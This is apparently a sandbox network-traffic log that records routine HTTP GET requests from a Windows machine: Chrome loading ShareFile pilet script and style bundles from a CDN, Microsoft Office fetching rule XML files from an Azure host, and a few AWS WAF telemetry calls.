            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-projects-pilet/2.0.29/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-storage-plugin-pilet/1.280.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-permissions-pilet/1.118.31/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-dashboard/0.164.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-storage-plugin-pilet/1.280.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-storage-plugin-pilet/1.280.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-permissions-pilet/1.118.31/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-permissions-pilet/1.118.31/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-dashboard/0.164.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-dashboard/0.164.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
